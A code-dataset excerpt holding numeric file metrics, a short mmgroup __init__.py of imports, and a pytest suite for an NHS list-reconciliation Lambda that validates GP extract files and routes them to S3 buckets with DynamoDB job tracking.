| 0.656652
| 0
| 0.074669
| 0.114339
| 1,618
| 43
| 85
| 37.627907
| 0.738311
| 0
| 0
| 0.606061
| 0
| 0
| 0.024722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151515
| false
| 0
| 0.090909
| 0
| 0.242424
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
756b5031278f6df402a9779f956a99892950bb6a
| 600
|
py
|
Python
|
src/mmgroup/generate_c/__init__.py
|
Martin-Seysen/mmgroup
|
6acd566f1079e7e27eec76352477fbba39eeb65f
|
[
"MIT"
] | 14
|
2020-07-10T20:12:05.000Z
|
2022-03-10T13:46:59.000Z
|
src/mmgroup/generate_c/__init__.py
|
Martin-Seysen/mmgroup
|
6acd566f1079e7e27eec76352477fbba39eeb65f
|
[
"MIT"
] | 1
|
2022-03-09T07:05:04.000Z
|
2022-03-18T20:17:11.000Z
|
src/mmgroup/generate_c/__init__.py
|
Martin-Seysen/mmgroup
|
6acd566f1079e7e27eec76352477fbba39eeb65f
|
[
"MIT"
] | 1
|
2022-02-07T21:08:00.000Z
|
2022-02-07T21:08:00.000Z
|
from mmgroup.generate_c.generate_functions import prepend_blanks
from mmgroup.generate_c.generate_functions import format_item
from mmgroup.generate_c.generate_functions import UserDirective
from mmgroup.generate_c.generate_functions import UserFormat
from mmgroup.generate_c.generate_functions import make_table
from mmgroup.generate_c.make_c_tables import TableGenerator
from mmgroup.generate_c.make_c_tables import make_doc
from mmgroup.generate_c.make_c_tables import c_snippet
from mmgroup.generate_c.make_pyx import pxd_to_pyx
from mmgroup.generate_c.make_pyx import pxd_to_function_list
| 35.294118
| 64
| 0.89
| 93
| 600
| 5.387097
| 0.247312
| 0.219561
| 0.379242
| 0.399202
| 0.802395
| 0.802395
| 0.802395
| 0.373253
| 0.151697
| 0
| 0
| 0
| 0.076667
| 600
| 16
| 65
| 37.5
| 0.904332
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
756d2da7bd158f2bed11aa9c1387ba937c40a906
| 14,776
|
py
|
Python
|
test/unit/validate_and_forward/test_validate_and_forward.py
|
NHSDigital/list-reconciliation
|
37b1ebe99a64275e23b0e7fb6a89415b92d14306
|
[
"MIT"
] | 4
|
2021-06-25T08:28:54.000Z
|
2021-12-16T11:03:42.000Z
|
test/unit/validate_and_forward/test_validate_and_forward.py
|
NHSDigital/list-reconciliation
|
37b1ebe99a64275e23b0e7fb6a89415b92d14306
|
[
"MIT"
] | 184
|
2021-06-24T15:27:08.000Z
|
2022-03-17T12:44:28.000Z
|
test/unit/validate_and_forward/test_validate_and_forward.py
|
NHSDigital/list-reconciliation
|
37b1ebe99a64275e23b0e7fb6a89415b92d14306
|
[
"MIT"
] | 3
|
2021-11-05T10:21:44.000Z
|
2022-03-04T14:29:24.000Z
|
import json
import boto3
import pytest
from database import Jobs
from freezegun import freeze_time
from jobs.statuses import JobStatus, ParseStatus
from lr_logging.exceptions import InvalidFilename, InvalidGPExtract, InvalidStructure
from pynamodb.exceptions import PutError, QueryError
from .conftest import INPUT_BUCKET, MESH_BUCKET, REJECTION_BUCKET
JOB_ID = "50e1b957-2fc4-44b0-8e60-d8f9ca162099"
INVALID_FILE = "inbound/A12023_GPR4LNA1.CSB"
VALID_FILE = "inbound/A82024_GPR4LNA1.CSA"
FILE_WITH_ONE_UNICODE_CHARACTER = "inbound/A82025_GPR4LNA1.CSA"
FILE_WITH_MULTIPLE_UNICODE_CHARACTERS = "inbound/A82026_GPR4LNA1.CSA"
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_valid_file_ok(
lambda_handler,
lambda_context,
valid_file_event,
create_mesh_bucket,
create_dynamodb_table,
):
app = lambda_handler
response = app.main(valid_file_event, lambda_context)
expected_message = "validate_and_forward file sent"
expected_file = VALID_FILE
actual_message = response["message"]
actual_file = response["file"]
assert actual_message == expected_message
assert actual_file == expected_file
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_invalid_file_ok(
lambda_handler,
lambda_context,
invalid_file_event,
create_rejection_bucket,
create_dynamodb_table,
):
app = lambda_handler
response = app.main(invalid_file_event, lambda_context)
expected_message = "Lambda application stopped gp extract input file rejected, rejected file handled"
expected_file = INVALID_FILE
actual_message = response["message"]
actual_file = response["file"]
assert actual_message == expected_message
assert actual_file == expected_file
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_valid_file_in_dps_mesh_bucket(
lambda_handler,
lambda_context,
valid_file_event,
create_mesh_bucket,
create_dynamodb_table,
):
app = lambda_handler
response = app.main(valid_file_event, lambda_context)
expected_message = "validate_and_forward file sent"
expected_file = VALID_FILE
actual_message = response["message"]
actual_file = response["file"]
assert actual_message == expected_message
assert actual_file == expected_file
client = boto3.client("s3")
bucket_objs = client.list_objects_v2(Bucket=MESH_BUCKET)
for obj in bucket_objs.get("Contents", []):
obj_name = obj["Key"]
file = client.get_object(Bucket=MESH_BUCKET, Key=str(obj_name))
file_body = file["Body"].read().decode("utf-8")
expected_len = 280
expected_file_body = "503\\*\nDOW~1~1111111,1234~LNA~20210328~1340~1557492~1234567890~SOMEBODY~JOHN~SOMEONE~MR~1~20020101~FLAT A~THE STREET\nDOW~2~~EAST~~E1 1AA~~3~~~\nDOW~1~1111111,1234~LNA~20210328~1340~1557493~1234567891~SOMEBODY~JANE~FOE~MISS~1~20120211~FLAT B~THE STREET\nDOW~2~~EAST~~E1 1AA~~3~~~\n"
actual_len = len(file_body)
actual_file_body = file_body
assert actual_len == expected_len
assert actual_file_body == expected_file_body
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_invalid_file_in_rejection_bucket(
lambda_handler,
lambda_context,
invalid_file_event,
create_rejection_bucket,
create_dynamodb_table,
):
app = lambda_handler
response = app.main(invalid_file_event, lambda_context)
expected_message = "Lambda application stopped gp extract input file rejected, rejected file handled"
expected_file = INVALID_FILE
actual_message = response["message"]
actual_file = response["file"]
assert actual_message == expected_message
assert actual_file == expected_file
client = boto3.client("s3")
bucket_objs = client.list_objects_v2(Bucket=REJECTION_BUCKET)
for obj in bucket_objs.get("Contents", []):
obj_name = obj["Key"]
file = client.get_object(Bucket=REJECTION_BUCKET, Key=str(obj_name))
json_content = json.loads(file["Body"].read().decode("utf-8"))
expected_file = "inbound/A12023_GPR4LNA1.CSB"
expected_error = "INVALID_STRUCTURE"
expected_message = ["Header must be 503\\*"]
actual_file = json_content["file"]
actual_error = json_content["error_type"]
actual_message = json_content["message"]
assert actual_file == expected_file
assert actual_error == expected_error
assert actual_message == expected_message
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_valid_file_sent_status_db(
lambda_handler,
lambda_context,
valid_file_event,
create_mesh_bucket,
create_dynamodb_table,
):
app = lambda_handler
response = app.main(valid_file_event, lambda_context)
expected_message = "validate_and_forward file sent"
expected_file = VALID_FILE
actual_message = response["message"]
actual_file = response["file"]
assert actual_message == expected_message
assert actual_file == expected_file
actual_job = Jobs.IdIndex.query(app.job_id)
for j in actual_job:
actual_practice_code = j.PracticeCode
actual_status_id = j.StatusId
expected_status_id = JobStatus.SENT_TO_DPS.value
expected_practice_code = "A82024"
assert actual_status_id == expected_status_id
assert actual_practice_code == expected_practice_code
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_invalid_file_rejection_status_db(
lambda_handler,
lambda_context,
invalid_file_event,
create_rejection_bucket,
create_dynamodb_table,
):
app = lambda_handler
response = app.main(invalid_file_event, lambda_context)
expected_message = "Lambda application stopped gp extract input file rejected, rejected file handled"
expected_file = INVALID_FILE
actual_message = response["message"]
actual_file = response["file"]
assert actual_message == expected_message
assert actual_file == expected_file
expected_status_id = JobStatus.REJECTED.value
expected_practice_code = ParseStatus.PARSE_FAILED.value
actual_job = Jobs.IdIndex.query(app.job_id)
for j in actual_job:
actual_status_id = j.StatusId
actual_practice_code = j.PracticeCode
assert actual_status_id == expected_status_id
assert actual_practice_code == expected_practice_code
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_create_initial_job(
lambda_handler,
lambda_context,
upload_valid_file,
create_dynamodb_table,
create_mesh_bucket,
):
app = lambda_handler
app.job_id = JOB_ID
app.input_file = f"inbound/{VALID_FILE}"
app.create_initial_job()
expected_practice_code = ParseStatus.NOT_PARSED.value
expected_status_id = JobStatus.PENDING.value
actual_job = Jobs.IdIndex.query(JOB_ID)
for j in actual_job:
actual_practice_code = j.PracticeCode
actual_status_id = j.StatusId
assert actual_status_id == expected_status_id
assert actual_practice_code == expected_practice_code
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_update_job_status(
lambda_handler,
lambda_context,
upload_valid_file,
create_dynamodb_table,
create_mesh_bucket,
):
app = lambda_handler
app.job_id = JOB_ID
app.input_file = f"inbound/{VALID_FILE}"
app.create_initial_job()
app.update_job_status("TESTING")
actual_job = Jobs.IdIndex.query(JOB_ID)
for j in actual_job:
actual_status_id = j.StatusId
expected_status_id = "TESTING"
assert actual_status_id == expected_status_id
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_parse_gp_extract(
lambda_handler,
lambda_context,
upload_valid_file,
create_dynamodb_table,
create_mesh_bucket,
):
app = lambda_handler
actual_response = app.parse_gp_extract(INPUT_BUCKET, VALID_FILE)
expected_response = ("A82024", 2)
assert actual_response == expected_response
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_process_invalid_filename_message(
lambda_handler,
lambda_context,
invalid_file_event,
create_rejection_bucket,
create_dynamodb_table,
):
app = lambda_handler
app.job_id = JOB_ID
app.input_file = f"inbound/{INVALID_FILE}"
app.upload_date = "2021-03-28 13:40:00"
msg = InvalidFilename({"message": ["File date must not be older than 14 days"]})
expected_response = {
"file": "inbound/inbound/A12023_GPR4LNA1.CSB",
"upload_date": "2021-03-28 13:40:00",
"error_type": "INVALID_FILENAME",
"message": ["File date must not be older than 14 days"],
}
actual_response = app.process_invalid_message(msg)
assert actual_response == expected_response
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_process_invalid_structure_message(
lambda_handler,
lambda_context,
invalid_file_event,
create_rejection_bucket,
create_dynamodb_table,
):
app = lambda_handler
app.job_id = JOB_ID
app.input_file = f"inbound/{INVALID_FILE}"
app.upload_date = "2021-03-28 13:40:00"
msg = InvalidStructure(r"Header must be 503\*")
expected_response = {
"file": "inbound/inbound/A12023_GPR4LNA1.CSB",
"upload_date": "2021-03-28 13:40:00",
"error_type": "INVALID_STRUCTURE",
"message": ["Header must be 503\\*"],
}
actual_response = app.process_invalid_message(msg)
assert actual_response == expected_response
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_process_invalid_gp_extract_message(
lambda_handler,
lambda_context,
invalid_file_event,
create_rejection_bucket,
create_dynamodb_table,
):
app = lambda_handler
app.job_id = JOB_ID
app.input_file = f"inbound/{INVALID_FILE}"
app.upload_date = "2021-03-28 13:40:00"
invalid_records = [
"""DOW~1~~~~~~~~KOF~~MR~1~20020101~FLAT A~THE STREET
DOW~2~~EAST~~E1 1AA~~3~~~""",
"""
DOW~1~1111111,1234~LNA~20200406~1340~1557494~1234567891~SAM~JACK~FOE~MISS~2~20120211~FLAT B~THE STREET
DOW~2~~EAST~~E1 1AA~~~~3%~""",
]
msg = InvalidGPExtract({"total_records": 10, "invalid_records": invalid_records})
expected_response = {
"file": "inbound/inbound/A12023_GPR4LNA1.CSB",
"upload_date": "2021-03-28 13:40:00",
"error_type": "INVALID_RECORDS",
"total_records": 10,
"total_invalid_records": 2,
"message": [
"""DOW~1~~~~~~~~KOF~~MR~1~20020101~FLAT A~THE STREET
DOW~2~~EAST~~E1 1AA~~3~~~""",
"""
DOW~1~1111111,1234~LNA~20200406~1340~1557494~1234567891~SAM~JACK~FOE~MISS~2~20120211~FLAT B~THE STREET
DOW~2~~EAST~~E1 1AA~~~~3%~""",
],
}
actual_response = app.process_invalid_message(msg)
assert actual_response == expected_response
# Unicode
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_file_with_one_unicode_char_returns_invalid_record_error(
lambda_handler,
lambda_context,
invalid_unicode_single_character_file_event,
create_mesh_bucket,
create_rejection_bucket,
create_dynamodb_table,
):
expected_error = "INVALID_RECORDS"
expected_message = "Lambda application stopped gp extract input file rejected, rejected file handled"
expected_file = FILE_WITH_ONE_UNICODE_CHARACTER
app = lambda_handler
response = app.main(invalid_unicode_single_character_file_event, lambda_context)
client = boto3.client("s3")
bucket_objs = client.list_objects_v2(Bucket=REJECTION_BUCKET)
for obj in bucket_objs.get("Contents", []):
obj_name = obj["Key"]
file = client.get_object(Bucket=REJECTION_BUCKET, Key=str(obj_name))
json_content = json.loads(file["Body"].read().decode("utf-8"))
actual_error = json_content["error_type"]
actual_message = response["message"]
actual_file = response["file"]
assert actual_error == expected_error
assert actual_message == expected_message
assert actual_file == expected_file
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_file_with_multiple_unicode_char_returns_invalid_record_error(
lambda_handler,
lambda_context,
invalid_unicode_multiple_character_file_event,
create_mesh_bucket,
create_rejection_bucket,
create_dynamodb_table,
):
expected_error = "INVALID_RECORDS"
expected_message = "Lambda application stopped gp extract input file rejected, rejected file handled"
expected_file = FILE_WITH_MULTIPLE_UNICODE_CHARACTERS
app = lambda_handler
response = app.main(invalid_unicode_multiple_character_file_event, lambda_context)
client = boto3.client("s3")
bucket_objs = client.list_objects_v2(Bucket=REJECTION_BUCKET)
for obj in bucket_objs.get("Contents", []):
obj_name = obj["Key"]
file = client.get_object(Bucket=REJECTION_BUCKET, Key=str(obj_name))
json_content = json.loads(file["Body"].read().decode("utf-8"))
actual_error = json_content["error_type"]
actual_message = response["message"]
actual_file = response["file"]
assert actual_error == expected_error
assert actual_message == expected_message
assert actual_file == expected_file
# Exceptions
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_create_job_no_db_exception(
lambda_handler,
lambda_context,
upload_valid_file,
create_mesh_bucket,
):
app = lambda_handler
app.job_id = JOB_ID
app.input_file = f"inbound/{VALID_FILE}"
with pytest.raises(PutError):
app.create_initial_job()
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_update_job_info_query_exception(
lambda_handler,
lambda_context,
upload_valid_file,
create_mesh_bucket,
):
app = lambda_handler
app.job_id = "invalid"
app.input_file = f"inbound/{VALID_FILE}"
with pytest.raises(QueryError):
app.update_job_info("test", "test")
@freeze_time("2021-03-28 13:40:00")
def test_validate_and_forward_update_job_status_query_exception(
lambda_handler,
lambda_context,
upload_valid_file,
create_mesh_bucket,
):
app = lambda_handler
app.job_id = "invalid"
app.input_file = f"inbound/{VALID_FILE}"
with pytest.raises(QueryError):
app.update_job_status("test", "test")
def test_validate_and_forward_file_cleanup_exception(
lambda_handler,
lambda_context,
create_dynamodb_table,
):
app = lambda_handler
with pytest.raises(Exception):
app.cleanup_files(INPUT_BUCKET, VALID_FILE)
def test_validate_and_forward_raises_key_error(lambda_handler, lambda_context):
event = {"error": "error"}
with pytest.raises(KeyError):
lambda_handler.main(event, lambda_context)
| 31.50533
| 313
| 0.732945
| 1,976
| 14,776
| 5.119939
| 0.099696
| 0.048829
| 0.018187
| 0.022734
| 0.848077
| 0.815855
| 0.795789
| 0.780765
| 0.759613
| 0.759613
| 0
| 0.056775
| 0.170344
| 14,776
| 468
| 314
| 31.57265
| 0.768497
| 0.001218
| 0
| 0.754667
| 0
| 0.002667
| 0.163762
| 0.04325
| 0
| 0
| 0
| 0
| 0.090667
| 1
| 0.050667
| false
| 0
| 0.024
| 0
| 0.074667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.